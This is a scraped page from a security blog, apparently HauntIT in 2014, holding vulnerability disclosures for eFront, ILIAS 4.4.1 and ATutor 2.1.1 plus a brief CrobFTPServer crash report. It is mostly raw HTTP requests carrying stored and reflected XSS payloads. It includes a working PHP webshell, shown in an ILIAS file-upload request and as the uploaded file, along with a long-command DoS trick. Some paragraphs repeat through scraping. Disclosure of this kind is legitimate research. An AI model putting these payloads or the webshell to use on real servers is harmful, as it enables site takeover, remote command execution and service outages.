# 3. Persistent XSS (again from admin, and again vulnerable is 'name' parameter)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=directions&add_direction=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 169
_qf__add_directions_form=&qfS_csrf=bcc380e9b626466a1f0829bc96174833&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&parent_direction_ID=0&submit_direction=Submit
---<request>---
# ===============================================================
# 4. Persistent xss (name parameter again)
---<request>---
POST /k/cms/efront/www/administrator.php?ctg=user_types&add_user_type=1&basic_type=student HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 607
_qf__add_type_form=&qfS_csrf=9c7ab093513d78bf919b45393b618564&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&basic_user_type=student&core_access%5Bcontent%5D=change&core_access%5Busers%5D=change&core_access%5Bstatistics%5D=change&core_access%5Bpersonal_messages%5D=change&core_access%5Bcontrol_panel%5D=change&core_access%5Bmove_block%5D=change&core_access%5Bmodule_itself%5D=change&core_access%5Bdashboard%5D=change&core_access%5Binsert_group_key%5D=change&core_access%5Bcalendar%5D=change&core_access%5Bsurveys%5D=change&core_access%5Bnews%5D=change&core_access%5Bforum%5D=change&submit_type=Save
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
[EN] ILIAS 4.4.1 Cross Site Scripting / Shell Upload
In latest ILIAS I found few interesting bugs. Beside XSS's one of my favourite was
that bug, when if www-some-site has open registration, normal registered user is able to
upload shell in PHP. ;)
Below you will find what and where you can check, but You can read more about it also here.
that bug, when if www-some-site has open registration, normal registered user is able to
upload shell in PHP. ;)
Below you will find what and where you can check, but You can read more about it also here.
# ==============================================================
# Title ...| Multiple vulnerabilities in ILIAS
# Version .| ilias-4.4.1.zip
# Date ....| 21.02.2014
# Found ...| HauntIT Blog
# Home ....| www.ilias.de
# ==============================================================
First from admin user logged in:
# ==============================================================
# 1. Persistent xss
---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=2&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=
ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 91
title=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&cmd%5BcreatePosting%5D=Add+Posting
---<request>---
# ==============================================================
# 2. Possibility of uploading webshell
Uploaded file can be found in the ILIAS directories, for example:
---<code>---
k@lab:~/public_html/cms/ilias$ cat ./44444/ilFile/3/file_334/001/shell.php
<?php system($_REQUEST['cmd']); ?>
k@lab:~/public_html/cms/ilias$
---<code>---
Direct access to this file will give you a webshell.
*
* This bug will be described later in section for 'normal/registered' user.
*
# ==============================================================
# 3. XSS
---<request>---
POST /k/cms/ilias/ilias.php?ref_id=1&new_type=webr&cmd=post&cmdClass=ilobjlinkresourcegui&
cmdNode=nm:9y&baseClass=ilRepositoryGUI&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 760
tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22tar_value
%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0D%0A%09%3Ca+id%3D%
22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%22ilias.php%3Fref_id%3D1%26n
ew_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternallinkgui%26cmdNode%3Dnm%3A9y%3A3l%3A3z
%3A3s%3Ai1%26baseClass%3DilRepositoryGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+
Object%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar
_rem%22%3E%0D%0A%09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remo
ve%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des=
asdasd&cmd%5Bsave%5D=Add+Weblink
---<request>---
---<response>---
Target: <span class="asterisk">*</span><br />
<input type="text" name="links[4][tar]" value="'>"><body/onload=alert(9999)>" size="40"
maxlength="500" />
---<response>---
# ==============================================================
# 4. Another webshell upload possibility
There is a possibility of creating webshell when php file is added as an attachement
to email to user(s).
All shells will be located in /ilias/ (wwwroot) directory with value from 'client_id'
(for example: client_id=44444, then your shell is in /ilias/44444/...)
# ==============================================================
Second: from normal/registered user logged in:
# ==============================================================
# 1. When normal user is registered on the latest ILIAS, he is able to add
PHP file contains simple shell. From this moment he will be able to hack
the whole server.
---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=file&cmd=post&cmdClass=
ilobjfilegui&cmdNode=mw:my:jh&baseClass=ilPersonalDesktopGUI&fallbackC
md=uploadFiles&rtoken=2e4e8af720b2204ea51503ca6388a325 HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache
-----------------------------1761332042190
Content-Disposition: form-data; name="title"
shell.php
-----------------------------1761332042190
Content-Disposition: form-data; name="description"
-----------------------------1761332042190
Content-Disposition: form-data; name="extract"
0
-----------------------------1761332042190
Content-Disposition: form-data; name="keep_structure"
0
-----------------------------1761332042190
Content-Disposition: form-data; name="upload_files"; filename="shell.php"
Content-Type: application/octet-stream
<?php system($_REQUEST['cmd']); ?>
-----------------------------1761332042190--
---<request>---
# ==============================================================
# 2. XSS (same place like when admin is logged in)
---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=webr&cmd=post&cmdClass=ilobjlinkresource
gui&cmdNode=mw:my:9y&baseClass=ilPersonalDesktopGUI&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 768
tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22
tar_value%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0
D%0A%09%3Ca+id%3D%22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%2
2ilias.php%3Fwsp_id%3D41%26new_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternal
linkgui%26cmdNode%3Dmw%3Amy%3A9y%3A3l%3A3z%3A3s%3Ai1%26baseClass%3DilPersonalDeskt
opGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+Object%3C%2Fa%3E%0D%0A%3C%
2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar_rem%22%3E%0D%0A%
09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remove%3C%2F
a%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des
=dsa&cmd%5Bsave%5D=Add+Weblink
---<request>---
# ==============================================================
# 3. Persistent xss
---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=111&bmn=2014-02&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 89
title=%27%3E%22%3E%3Cbody%2Fonload%3Dalert%28123%29%3E&cmd%5BcreatePosting%5D=Add+Posting
---<request>---
[EN] ATutor 2.1.1 XSS
Last days I found few bugs in latest version of 2 popular webapplications. Both
you can find here but below you have detailed findings for latest ATutor (2.1.1).
you can find here but below you have detailed findings for latest ATutor (2.1.1).
# ==============================================================
# Title ...| ATutor Multiple vulnerabilities
# Version .| ATutor-2.1.1
# Date ....| 19.02.2014
# Found ...| HauntIT Blog
# Home ....| https://atutor.ca
# ==============================================================
# ==============================================================
# 1. During installation: xss and sql insertion:
---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 191
action=process&step=2&new_version=2.1.1&db_host=localhost&db_port=3306&db_login=root&db_password=superpass&db_name='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&tb_prefix=AT_&submit=Next+%BB+
---<request>---
---<response>---
<ul><li>Database <b>\'>\"><script>alert(1)</script></b> created successfully.
---<response>---
--> tb_prefix and new_version parameter are also vulnerable.
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 667
action=process&form_admin_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&form_account_password_hidden=5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&step=3&step2%5Bnew_version%5D='%3e"%3e%3cscript%3ealert(1)%3c%2fscript%3e&step2%5Bdb_host%5D=localhost&step2%5Bdb_port%5D=3306&step2%5Bdb_login%5D=root&step2%5Bdb_password%5D=superpass&step2%5Bdb_name%5D=atutor&step2%5Btb_prefix%5D=AT_&smtp=false&admin_username=admin&admin_password=&admin_email=admin%40here.com&site_name=Course+Server&email=admin%40here.com&just_social=0&home_url=&account_username=admin&account_password=&account_email=admin%40here.com&account_fname=admin&account_lname=admin&submit=+Next+%BB
---<request>---
Vulnerable to XSS are also parameters:
step2%5Bnew_version%5D
step2%5Bdb_host%5D
step2%5Bdb_port%5D
step2%5Bdb_login%5D
step2%5Bdb_password%5D
step2%5Bdb_name%5D
step2%5Btb_prefix%5D
# ==============================================================
# 3. Persistent XSS (from admin)
---<request>---
POST /k/cms/atutor/ATutor/mods/_standard/forums/admin/forum_add.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 108
add_forum=true&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&description=aaaaaaaaaaaaaa&edit=0&submit=Save
---<request>---
---<response>---
<span class="required" title="Required Field">*</span><label for="title">Title</label><br />
<input type="text" name="title" size="40" id="title" value="'>"><body/onload=alert(9999)>" />
</div>
---<response>---
# ==============================================================
# 4. Edit config (from admin user):
---<request>---
POST /k/cms/atutor/ATutor/admin/config_edit.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 946
site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save
---<request>--- If you have any questions, feel free to ask directly (via mail or comments).
Thanks ;) Saturday, 22 February 2014
[EN] Two more publications
Tuesday, 18 February 2014
[EN] CrobFTPServer DoS
During fuzzing some old apps I found an interesting behavior of one of the FTP servers - CrobFTPServer.
When you will send to the server a "CD" command longer that 500 A's
the server will stop ;)
Check it out ;)
It seems that there is more bugs;)
When you will send to the server a "CD" command longer that 500 A's
the server will stop ;)
 | |||
| CrobFTP Server - DoS |
Check it out ;)
It seems that there is more bugs;)
Subscribe to:
Posts (Atom)